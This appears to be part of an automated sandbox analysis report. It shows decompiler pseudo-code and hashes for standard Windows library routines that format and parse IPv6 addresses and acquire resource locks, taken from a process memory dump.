                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
                                                • Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0x912926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0x919cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
                                                							L14:
                                                							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E00947707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E00947707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                 			}
                                                0x009513bc
                                                0x009513bf
                                                0x009513bf
                                                0x009513c2
                                                0x00951424
                                                0x00951424
                                                0x00951424
                                                0x00951427
                                                0x0095142b
                                                0x0095142c
                                                0x0095142c
                                                0x0095142c
                                                0x00000000
                                                0x0095141c
                                                0x00951411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
                                                • Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							L0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E00950CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E00950CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E00950CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E00950CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 49%
                                                			E00950554(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int* _t49;
                                                				signed int _t51;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				signed int _t70;
                                                				void* _t75;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t96;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t110;
                                                				signed int _t115;
                                                				signed int* _t119;
                                                				void* _t125;
                                                				void* _t126;
                                                				signed int _t128;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t144;
                                                				void* _t158;
                                                				void* _t159;
                                                				void* _t160;
                                                
                                                				_t96 = _a4;
                                                				_t115 =  *(_t96 + 0x28);
                                                				_push(_t138);
                                                				if(_t115 < 0) {
                                                					_t105 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                						goto L6;
                                                					} else {
                                                						__eflags = _t115 | 0xffffffff;
                                                						asm("lock xadd [eax], edx");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L6:
                                                					_push(_t128);
                                                					while(1) {
                                                						L7:
                                                						__eflags = _t115;
                                                						if(_t115 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                							_t49 = _t96 + 0x1c;
                                                							_t106 = 1;
                                                							asm("lock xadd [edx], ecx");
                                                							_t115 =  *(_t96 + 0x28);
                                                							__eflags = _t115;
                                                							if(_t115 < 0) {
                                                								L23:
                                                								_t130 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
                                                									_push(_t144);
                                                									_push(0);
                                                									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                									__eflags = _t51 - 0x102;
                                                									if(_t51 != 0x102) {
                                                										break;
                                                									}
                                                									_t106 =  *(_t144 + 4);
                                                									_t126 =  *_t144;
                                                									_t86 = L00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                									_push(_t126);
                                                									_push(_t86);
                                                									L00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                									L00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                									_t130 = _t130 + 1;
                                                									_t160 = _t158 + 0x28;
                                                									__eflags = _t130 - 2;
                                                									if(__eflags > 0) {
                                                										E0099217A(_t106, __eflags, _t96);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									L00963F92();
                                                									_t158 = _t160 + 0xc;
                                                								}
                                                								__eflags = _t51;
                                                								if(__eflags < 0) {
                                                									_push(_t51);
                                                									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                									asm("int3");
                                                									while(1) {
                                                										L32:
                                                										__eflags = _a8;
                                                										if(_a8 == 0) {
                                                											break;
                                                										}
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                										_t119 = _t96 + 0x24;
                                                										_t107 = 1;
                                                										asm("lock xadd [eax], ecx");
                                                										_t56 =  *(_t96 + 0x28);
                                                										_a4 = _t56;
                                                										__eflags = _t56;
                                                										if(_t56 != 0) {
                                                											L40:
                                                											_t128 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                												asm("sbb esi, esi");
                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
                                                												_push(_t138);
                                                												_push(0);
                                                												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                												__eflags = _t58 - 0x102;
                                                												if(_t58 != 0x102) {
                                                													break;
                                                												}
                                                												_t107 =  *(_t138 + 4);
                                                												_t125 =  *_t138;
                                                												_t75 = L00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                												_push(_t125);
                                                												_push(_t75);
                                                												L00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                												L00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                												_t128 = _t128 + 1;
                                                												_t159 = _t158 + 0x28;
                                                												__eflags = _t128 - 2;
                                                												if(__eflags > 0) {
                                                													E0099217A(_t107, __eflags, _t96);
                                                												}
                                                												_push("RTL: Re-Waiting\n");
                                                												_push(0);
                                                												_push(0x65);
                                                												L00963F92();
                                                												_t158 = _t159 + 0xc;
                                                											}
                                                											__eflags = _t58;
                                                											if(__eflags < 0) {
                                                												_push(_t58);
                                                												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                												asm("int3");
                                                												_t61 =  *_t107;
                                                												 *_t107 = 0;
                                                												__eflags = _t61;
                                                												if(_t61 == 0) {
                                                													L1:
                                                													_t63 = E00935384(_t138 + 0x24);
                                                													if(_t63 != 0) {
                                                														goto L52;
                                                													} else {
                                                														goto L2;
                                                													}
                                                												} else {
                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                													_push( &_a4);
                                                													_push(_t61);
                                                													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
                                                													__eflags = _t70;
                                                													if(__eflags >= 0) {
                                                														goto L1;
                                                													} else {
                                                														_push(_t70);
                                                														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                														L52:
                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                														_push( &_a4);
                                                														_push(1);
                                                														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
                                                														__eflags = _t63;
                                                														if(__eflags >= 0) {
                                                															L2:
                                                															return _t63;
                                                														} else {
                                                															_push(_t63);
                                                															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                															_push( &_a4);
                                                															_push(1);
                                                															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
                                                															__eflags = _t63;
                                                															if(__eflags >= 0) {
                                                																goto L2;
                                                															} else {
                                                																_push(_t63);
                                                																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                																asm("int3");
                                                																while(1) {
                                                																	_t110 = _t66;
                                                																	__eflags = _t66 - 1;
                                                																	if(_t66 != 1) {
                                                																		break;
                                                																	}
                                                																	_t128 = _t128 | 0xffffffff;
                                                																	_t66 = _t110;
                                                																	asm("lock cmpxchg [ebx], edi");
                                                																	__eflags = _t66 - _t110;
                                                																	if(_t66 != _t110) {
                                                																		continue;
                                                																	} else {
                                                																		_t67 =  *[fs:0x18];
                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                																		return _t67;
                                                																	}
                                                																	goto L58;
                                                																}
                                                																E00935329(_t110, _t138);
                                                																return E009353A5(_t138, 1);
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_t56 =  *(_t96 + 0x28);
                                                												goto L3;
                                                											}
                                                										} else {
                                                											_t107 =  *_t119;
                                                											__eflags = _t107;
                                                											if(__eflags > 0) {
                                                												while(1) {
                                                													_t81 = _t107;
                                                													asm("lock cmpxchg [edi], esi");
                                                													__eflags = _t81 - _t107;
                                                													if(_t81 == _t107) {
                                                														break;
                                                													}
                                                													_t107 = _t81;
                                                													__eflags = _t81;
                                                													if(_t81 > 0) {
                                                														continue;
                                                													}
                                                													break;
                                                												}
                                                												_t56 = _a4;
                                                												__eflags = _t107;
                                                											}
                                                											if(__eflags != 0) {
                                                												while(1) {
                                                													L3:
                                                													__eflags = _t56;
                                                													if(_t56 != 0) {
                                                														goto L32;
                                                													}
                                                													_t107 = _t107 | 0xffffffff;
                                                													_t56 = 0;
                                                													asm("lock cmpxchg [edx], ecx");
                                                													__eflags = 0;
                                                													if(0 != 0) {
                                                														continue;
                                                													} else {
                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                														return 1;
                                                													}
                                                													goto L58;
                                                												}
                                                												continue;
                                                											} else {
                                                												goto L40;
                                                											}
                                                										}
                                                										goto L58;
                                                									}
                                                									__eflags = 0;
                                                									return 0;
                                                								} else {
                                                									_t115 =  *(_t96 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t106 =  *_t49;
                                                								__eflags = _t106;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t93 = _t106;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t93 - _t106;
                                                										if(_t93 == _t106) {
                                                											break;
                                                										}
                                                										_t106 = _t93;
                                                										__eflags = _t93;
                                                										if(_t93 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									__eflags = _t106;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						}
                                                						goto L58;
                                                					}
                                                					_t84 = _t115;
                                                					asm("lock cmpxchg [esi], ecx");
                                                					__eflags = _t84 - _t115;
                                                					if(_t84 != _t115) {
                                                						_t115 = _t84;
                                                						goto L7;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				L58:
                                                			}
                                                0x00972319
                                                0x0097231a
                                                0x0097231d
                                                0x00972320
                                                0x00972323
                                                0x00972323
                                                0x00972328
                                                0x0097232d
                                                0x0097232f
                                                0x00972331
                                                0x00972336
                                                0x00972336
                                                0x0097233b
                                                0x0097233d
                                                0x00972350
                                                0x00972351
                                                0x00972356
                                                0x00972359
                                                0x00972359
                                                0x0097235b
                                                0x0097235d
                                                0x00935367
                                                0x0093536b
                                                0x00935372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00972363
                                                0x00972363
                                                0x00972369
                                                0x0097236a
                                                0x0097236c
                                                0x00972371
                                                0x00972373
                                                0x00000000
                                                0x00972379
                                                0x00972379
                                                0x0097237a
                                                0x0097237f
                                                0x0097237f
                                                0x00972385
                                                0x00972386
                                                0x00972389
                                                0x0097238e
                                                0x00972390
                                                0x00935378
                                                0x0093537c
                                                0x00972396
                                                0x00972396
                                                0x00972397
                                                0x0097239c
                                                0x009723a2
                                                0x009723a3
                                                0x009723a6
                                                0x009723ab
                                                0x009723ad
                                                0x00000000
                                                0x009723b3
                                                0x009723b3
                                                0x009723b4
                                                0x009723b9
                                                0x009723ba
                                                0x009723ba
                                                0x009723bc
                                                0x009723bf
                                                0x00000000
                                                0x00000000
                                                0x00969153
                                                0x00969158
                                                0x0096915a
                                                0x0096915e
                                                0x00969160
                                                0x00000000
                                                0x00969166
                                                0x00969166
                                                0x00969171
                                                0x00969176
                                                0x00969176
                                                0x00000000
                                                0x00969160
                                                0x009723c6
                                                0x009723d7
                                                0x009723d7
                                                0x009723ad
                                                0x00972390
                                                0x00972373
                                                0x0097233f
                                                0x0097233f
                                                0x00000000
                                                0x0097233f
                                                0x00972291
                                                0x00972291
                                                0x00972293
                                                0x00972295
                                                0x0097229a
                                                0x009722a1
                                                0x009722a3
                                                0x009722a7
                                                0x009722a9
                                                0x00000000
                                                0x00000000
                                                0x009722ab
                                                0x009722ad
                                                0x009722af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722af
                                                0x009722b1
                                                0x009722b4
                                                0x009722b4
                                                0x009722b6
                                                0x009353be
                                                0x009353be
                                                0x009353be
                                                0x009353c0
                                                0x00000000
                                                0x00000000
                                                0x009353cb
                                                0x009353ce
                                                0x009353d0
                                                0x009353d4
                                                0x009353d6
                                                0x00000000
                                                0x009353d8
                                                0x009353e3
                                                0x009353ea
                                                0x009353ea
                                                0x00000000
                                                0x009353d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722b6
                                                0x00000000
                                                0x0097228f
                                                0x00972349
                                                0x0097234d
                                                0x00972251
                                                0x00972251
                                                0x00000000
                                                0x00972251
                                                0x009721a4
                                                0x009721a4
                                                0x009721a6
                                                0x009721a8
                                                0x009721ac
                                                0x009721b6
                                                0x009721b8
                                                0x009721bc
                                                0x009721be
                                                0x00000000
                                                0x00000000
                                                0x009721c0
                                                0x009721c2
                                                0x009721c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009721c4
                                                0x009721c6
                                                0x009721c6
                                                0x009721c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009721c8
                                                0x009721a2
                                                0x00000000
                                                0x00972183
                                                0x0095057b
                                                0x0095057d
                                                0x00950581
                                                0x00950583
                                                0x00972178
                                                0x00000000
                                                0x00950589
                                                0x0095058f
                                                0x0095058f
                                                0x00950583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
